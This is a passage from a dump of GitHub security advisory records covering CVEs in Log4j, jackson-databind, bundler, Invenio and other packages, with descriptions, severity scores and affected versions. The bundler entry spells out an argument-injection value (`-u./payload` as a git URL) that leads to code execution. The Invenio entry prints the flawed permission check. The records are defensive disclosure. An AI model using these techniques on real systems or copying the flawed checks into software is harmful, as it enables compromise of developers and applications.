'https://github.com/opencast/opencast'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T15:22:20Z', 'nvd_published_at': None}" +1.4.0,GHSA-2mqv-4j3r-vjvp,2021-12-16T18:42:05Z,2021-12-16T18:52:21Z,,['CVE-2021-43812'],Open redirect in @auth0/nextjs-auth0,"### Overview + +Versions `<=1.6.1` do not filter out certain `returnTo` parameter values from the login url, which expose the application to an open redirect vulnerability. + +### Am I affected? +You are affected by this vulnerability if you are using `@auth0/nextjs-auth0` version `<=1.6.1`. + +### How to fix that? +Upgrade to version `>=1.6.2` + +### Will this update impact my users? +The fix provided in the patch will not affect your users. + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@auth0/nextjs-auth0'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-2mqv-4j3r-vjvp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43812'}, {'type': 'WEB', 'url': 'https://github.com/auth0/nextjs-auth0/commit/0bbd9f8a0c93af51f607f28633b5fb18c5e48ad6'}, {'type': 'PACKAGE', 'url': 'https://github.com/auth0/nextjs-auth0'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-16T18:42:05Z', 'nvd_published_at': '2021-12-16T19:15:00Z'}" +1.4.0,GHSA-fp5r-v3w9-4333,2022-02-08T20:28:50Z,2021-12-14T19:49:31Z,,['CVE-2021-4104'],JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data,"JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'log4j:log4j'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'last_affected': '1.2.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4104'}, {'type': 'WEB', 'url': 'https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2021-4104'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/logging-log4j2'}, {'type': 'WEB', 'url': 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202209-02'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211223-0007/'}, {'type': 'WEB', 'url': 'https://www.cve.org/CVERecord?id=CVE-2021-44228'}, {'type': 'WEB', 'url': 'https://www.kb.cert.org/vuls/id/930724'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2022/01/18/3'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T19:47:27Z', 'nvd_published_at': '2021-12-14T12:15:00Z'}" +1.4.0,GHSA-76qm-4f93-fg6f,2022-09-21T22:30:52Z,2021-12-09T19:30:29Z,,['CVE-2015-9545'],Improper Input Validation in xdLocalStorage,An issue was discovered in xdLocalStorage through 2.0.5. The receiveMessage() function in xdLocalStorage.js does not implement any validation of the origin of web messages. Remote attackers who can entice a user to load a malicious site can exploit this issue to impact the confidentiality and integrity of data in the local storage of the vulnerable site via malicious web messages.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'xdlocalstorage'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-9545'}, {'type': 'WEB', 'url': 'https://github.com/ofirdagan/cross-domain-local-storage/issues/17'}, {'type': 'WEB', 'url': 'https://github.com/ofirdagan/cross-domain-local-storage/pull/19'}, {'type': 'WEB', 'url': 'https://github.com/ofirdagan/cross-domain-local-storage'}, {'type': 'WEB', 'url': 'https://grimhacker.com/exploiting-xdlocalstorage-localstorage-and-postmessage/#Missing-Origin-Client'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T16:14:14Z', 'nvd_published_at': '2020-04-07T18:15:00Z'}" +1.4.0,GHSA-6vvh-5794-vpmj,2022-01-04T18:57:26Z,2021-12-17T20:40:58Z,,['CVE-2020-35216'],An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false member down event messages.,An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false member down event messages.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.atomix:atomix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35216'}, {'type': 'WEB', 'url': 'https://docs.google.com/presentation/d/1woXwR3vciv7ltFan6LyK5vsWXmaUi8ArZonhk80Gr5U/edit?usp=sharing'}, {'type': 'PACKAGE', 'url': 'https://github.com/atomix/atomix'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T15:12:52Z', 'nvd_published_at': '2021-12-16T20:15:00Z'}" +1.4.0,GHSA-2v5j-q74q-r53f,2021-12-03T15:19:07Z,2021-12-03T20:42:26Z,,['CVE-2021-3994'],django-helpdesk is vulnerable to Cross-site Scripting,django-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-helpdesk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3994'}, {'type': 'WEB', 'url': 'https://github.com/django-helpdesk/django-helpdesk/commit/a22eb0673fe0b7784f99c6b5fd343b64a6700f06'}, {'type': 'PACKAGE', 'url': 'https://github.com/django-helpdesk/django-helpdesk'}, {'type': 'WEB', 'url': 'https://github.com/django-helpdesk/django-helpdesk/releases/tag/0.3.2'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/be7f211d-4bfd-44fd-91e8-682329906fbd'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T21:21:25Z', 'nvd_published_at': '2021-12-01T11:15:00Z'}" +1.4.0,GHSA-7rpj-hg47-cx62,2023-03-21T16:18:09Z,2021-12-16T14:29:57Z,,['CVE-2021-23463'],Improper Restriction of XML External Entity Reference in com.h2database:h2.,"H2 is an embeddable RDBMS written in Java. The package com.h2database:h2 from 1.4.198 and before 2.0.202 are vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object, when it receives parsed string data from org.h2.jdbc.JdbcResultSet.getSQLXML() method. If it executes the getSource() method when the parameter is DOMSource.class it will trigger the vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.h2database:h2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.198'}, {'fixed': '2.0.202'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23463'}, {'type': 'WEB', 'url': 'https://github.com/h2database/h2database/issues/3195'}, {'type': 'WEB', 'url': 'https://github.com/h2database/h2database/pull/3199'}, {'type': 'WEB', 'url': 'https://github.com/h2database/h2database/pull/3199#issuecomment-1002830390'}, {'type': 'WEB', 'url': 'https://github.com/boris-unckel/h2database/commit/f9ad6aef2bfa59eba2b4d3e7c4c32d2cce8e8b05'}, {'type': 'WEB', 'url': 'https://github.com/h2database/h2database/commit/d83285fd2e48fb075780ee95badee6f5a15ea7f8%23diff-008c2e4462609982199cd83e7cf6f1d6b41296b516783f6752c44b9f15dc7bc3'}, {'type': 'PACKAGE', 'url': 'https://github.com/h2database/h2database/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230818-0010/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-COMH2DATABASE-1769238'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T14:17:37Z', 'nvd_published_at': '2021-12-10T20:15:00Z'}" +1.4.0,GHSA-r3gr-cxrf-hg25,2022-02-08T22:01:01Z,2021-12-09T19:15:11Z,,['CVE-2020-35491'],Serialization gadgets exploit in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.9.10.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.7'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35491'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2986'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210122-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502', 'CWE-913'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T21:05:38Z', 'nvd_published_at': '2020-12-17T19:15:00Z'}" +1.4.0,GHSA-fj7f-vq84-fh43,2021-12-14T15:31:09Z,2021-12-08T19:51:36Z,,['CVE-2021-43809'],Local Code Execution through Argument Injection via dash leading git url parameter in Gemfile.,"In `bundler` versions before 2.2.33, when working with untrusted and apparently harmless `Gemfile`'s, it is not expected that they lead to execution of external code, unless that's explicit in the ruby code inside the `Gemfile` itself. However, if the `Gemfile` includes `gem` entries that use the `git` option with invalid, but seemingly harmless, values with a leading dash, this can be false. + +To handle dependencies that come from a Git repository instead of a registry, Bundler uses various commands, such as `git clone`. These commands are being constructed using user input (e.g. the repository URL). When building the +commands, Bundler versions before 2.2.33 correctly avoid Command Injection vulnerabilities by passing an array of arguments instead of a command string. However, there is the possibility that a user input starts with a dash (`-`) and is therefore treated as an optional argument instead of a positional one. This can lead to Code Execution because some of the commands have options that can be leveraged to run arbitrary executables. + +Since this value comes from the `Gemfile` file, it can contain any character, including a leading dash. + +### Exploitation + +To exploit this vulnerability, an attacker has to craft a directory containing a `Gemfile` file that declares a dependency that is located in a Git repository. This dependency has to have a Git URL in the form of `-u./payload`. This URL +will be used to construct a Git clone command but will be interpreted as the [upload-pack](https://git-scm.com/docs/git-clone#Documentation/git-clone.txt--ultupload-packgt) argument. Then this directory needs to be shared with the victim, who then needs to run a command that evaluates the Gemfile, such as `bundle lock`, inside. + +### Impact + +This vulnerability can lead to Arbitrary Code Execution, which could potentially lead to the takeover of the system. However, as explained above, the exploitability is very low, because it requires a lot of user interaction. It still could put developers at risk when dealing with untrusted files in a way they think is safe, because the exploit still works when the victim tries to make sure nothing can happen, e.g. by manually reviewing the `Gemfile` (although they would need the weird URL with a leading dash to not raise any flags). + +This kind of attack vector [has been used in the past](https://www.cnbc.com/2021/01/26/north-korean-hackers-targeting-security-researchers-on-twitter.html) to target security researchers by sending them projects to collaborate on. + +### Patches + +Bundler 2.2.33 has patched this problem by inserting `--` as an argument before any positional arguments to those Git commands that were affected by this issue. + +### Workarounds + +Regardless of whether users can upgrade or not, they should review any untrustred `Gemfile`'s before running any `bundler` commands that may read them, since they can contain arbitrary ruby code. + +### References + +https://cwe.mitre.org/data/definitions/88.html","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'bundler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.33'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rubygems/rubygems/security/advisories/GHSA-fj7f-vq84-fh43'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43809'}, {'type': 'WEB', 'url': 'https://github.com/rubygems/rubygems/pull/5142'}, {'type': 'WEB', 'url': 'https://github.com/rubygems/rubygems/commit/0fad1ccfe9dd7a3c5b82c1496df3c2b4842870d3'}, {'type': 'WEB', 'url': 'https://github.com/rubygems/rubygems/commit/a4f2f8ac17e6ce81c689527a8b6f14381060d95f'}, {'type': 'PACKAGE', 'url': 'https://github.com/rubygems/rubygems'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bundler/CVE-2021-43809.yml'}]","{'cwe_ids': ['CWE-88'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-08T19:33:42Z', 'nvd_published_at': '2021-12-08T19:15:00Z'}" +1.4.0,GHSA-g7mq-rfj2-25wq,2023-09-11T16:19:43Z,2021-12-10T17:26:33Z,,['CVE-2021-23390'],Code Injection in total4,The package total4 before 0.0.43 are vulnerable to Arbitrary Code Execution via the `U.set()` and `U.get()` functions.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'total4'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.43'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23390'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework4/commit/8a72d8c20f38bbcac031a76a51238aa528f68821'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework4/blob/master/utils.js%23L5430-L5455'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TOTAL4-1130527'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-13T19:43:28Z', 'nvd_published_at': '2021-07-12T16:15:00Z'}" +1.4.0,GHSA-9gph-22xh-8x98,2023-09-14T16:07:39Z,2021-12-09T19:15:54Z,,['CVE-2020-36179'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.9.10.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.6.7.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36179'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/3004'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc255f41d9a61d3dc79a51fb5c713de4ae10e71e3673feeb0b180b436@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:37:47Z', 'nvd_published_at': '2021-01-07T00:15:00Z'}" +1.4.0,GHSA-xr38-w74q-r8jv,2021-12-06T23:56:39Z,2021-12-06T23:57:59Z,,['CVE-2021-43781'],Permissions not properly checked in Invenio-Drafts-Resources,"### Impact + +Invenio-Drafts-Resources does not properly check permissions when a record is published. The vulnerability is exploitable in a default installation of InvenioRDM. An authenticated user is able via REST API calls to publish draft records of other users if they know the record identifier and the draft validates (e.g. all require fields filled out). An attacker is not able to modify the data in the record, and thus e.g. *cannot* change a record from restricted to public. + +### Details + +The service's ``publish()`` method contains the following permission check: + +```python +def publish(..): + self.require_permission(identity, ""publish"") +``` +However, the record should have been passed into the permission check so that the need generators have access to e.g. the record owner. + +```python +def publish(..): + self.require_permission(identity, ""publish"", record=record) +``` +The bug is activated in Invenio-RDM-Records which has a need generator called ``RecordOwners()``, which when no record is passed in defaults to allow any authenticated user: + +```python +class RecordOwners(Generator): + def needs(self, record=None, **kwargs): + if record is None: + return [authenticated_user] + # ... +``` + +### Patches + +The problem is patched in Invenio-Drafts-Resources v0.13.7 and 0.14.6+, which is part of InvenioRDM v6.0.1 and InvenioRDM v7.0 respectively. + +You can verify the version installed of Invenio-Drafts-Resources via PIP: + +```console +cd ~/src/my-site +pipenv run pip freeze | grep invenio-drafts-resources +``` + +### References + +- [Security policy](https://invenio.readthedocs.io/en/latest/community/security-policy.html) + +### For more information + +If you have any questions or comments about this advisory: +* Chat with us on Discord: https://discord.gg/8qatqBC + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'invenio-drafts-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.13.7'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'invenio-app-rdm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.5'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'invenio-rdm-records'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.32.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'invenio-drafts-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.0'}, {'fixed': '0.14.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'invenio-rdm-records'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.33.0'}, {'fixed': '0.33.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/inveniosoftware/invenio-drafts-resources/security/advisories/GHSA-xr38-w74q-r8jv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43781'}, {'type': 'WEB', 'url': 'https://github.com/inveniosoftware/invenio-drafts-resources/commit/039b0cff1ad4b952000f4d8c3a93f347108b6626'}]","{'cwe_ids': ['CWE-862', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T22:15:02Z', 'nvd_published_at': '2021-12-06T18:15:00Z'}" +1.4.0,GHSA-p6xc-xr62-6r2g,2022-08-11T21:38:34Z,2021-12-18T18:00:07Z,,['CVE-2021-45105'],Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion,"Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0 and 2.12.3. + + +# Affected packages +Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.logging.log4j:log4j-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.12.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.logging.log4j:log4j-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.13.0'}, {'fixed': '2.17.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.logging.log4j:log4j-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-45105'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/12/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ/'}, {'type': 'WEB', 'url': 'https://logging.apache.org/log4j/2.x/security.html'}, {'type': 'WEB', 'url': 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211218-0001/'}, {'type': 'WEB', 'url': 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5024'}, {'type': 'WEB', 'url': 'https://www.kb.cert.org/vuls/id/930724'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.zerodayinitiative.com/advisories/ZDI-21-1541/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/12/19/1'}]","{'cwe_ids': ['CWE-20', 'CWE-674'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-18T17:59:37Z', 'nvd_published_at': '2021-12-18T12:15:00Z'}" +1.4.0,GHSA-945q-ch46-pchg,2022-06-22T18:29:35Z,2021-12-01T00:00:40Z,,['CVE-2021-22095'],Deserialization of Untrusted Data in Spring AMQP,"In Spring AMQP versions 2.2.0 - 2.2.19 and 2.3.0 - 2.3.11, the Spring AMQP Message object, in its toString() method, will create a new String object from the message body, regardless of its size. This can cause an OOM Error with a large message","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.amqp:spring-amqp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.19'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.2.18'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.amqp:spring-amqp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.3.10'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22095'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2021-22097'}]","{'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2022-06-22T18:29:35Z', 'nvd_published_at': '2021-11-30T19:15:00Z'}" +1.4.0,GHSA-8c4j-34r4-xr8g,2023-09-14T16:13:00Z,2021-12-09T19:16:18Z,,['CVE-2020-36180'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.9.10.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.6.7.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36180'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/3004'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': 